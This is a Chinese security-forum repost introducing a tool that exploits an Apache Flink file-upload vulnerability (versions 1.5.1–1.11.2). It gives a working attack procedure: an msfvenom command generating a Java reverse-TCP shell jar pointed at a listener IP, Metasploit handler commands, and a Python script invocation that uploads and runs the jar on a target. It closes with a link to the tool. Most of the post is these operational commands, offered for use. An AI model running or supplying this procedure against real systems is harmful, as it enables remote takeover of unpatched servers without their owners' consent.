安全矩阵

 找回密码
 立即注册
搜索
查看: 724|回复: 0

Apache-Flink文件上传漏洞利用

[复制链接]

181

主题

182

帖子

721

积分

高级会员

Rank: 4

积分
721
发表于 2023-5-23 21:09:05 | 显示全部楼层 |阅读模式
本帖最后由 wangqiang 于 2023-5-23 21:22 编辑

Apache-Flink文件上传漏洞利用
FeiNiao Web安全工具库
2023-05-22 08:00 发表于河南
转载自:Apache-Flink文件上传漏洞利用
0x01 工具介绍
Apache Flink是一个面向数据流处理和批量数据处理的可分布式的开源计算框架。它可以用来做批处理,即处理静态的数据集、历史的数据集;也可以用来做流处理,
即实时地处理一些实时数据流,实时地产生数据的结果;也可以用来做一些基于事件的应用;该漏洞允许攻击者利用REST API,并通过精心构造的HTTP Header,实现远程文件写入。影响版本:Apache Flink: 1.5.1 —— 1.11.2
0x02 安装与使用
1、首先需要使用msf生成一个jar包的攻击载荷
  1. msfvenom -p java/shell_reverse_tcp lhost=192.168.99.5 lport=4444 -f jar > exp.jar​
复制代码


2、将攻击载荷exp.jar放入到python脚本的同级目录下,注:在脚本中攻击载荷的名字写死了为exp.jar,使用者若想更换可以修改源码进行更换,攻击载荷生成完成后,在msf上建立监听接受反弹的shell​​​​​​​
  1. use exploit/multi/handler

  2. set payload java/shell/reverse_tcp

  3. set LHOST 0.0.0.0

  4. set LPORT 4444

  5. exploit
复制代码

3、随后执行python脚本​​​​​​​
python .\apache_flink文件上传getshell.py -u http://192.168.99.7:8081

4、脚本会返回apache-flink的版本信息,若存在漏洞则会上传exp.jar包,成功上传后会返回jar包落地的文件名,并且会执行该jar包,执行完攻击载荷就可以在msf上看是否反弹了shell回来,成功反弹shell,并且可以成功执行命令。
0x03 项目链接下载
https://github.com/FeiNiao/Apache-flink-fileupload-getshell






回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 18:00 , Processed in 0.016711 second(s), 29 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表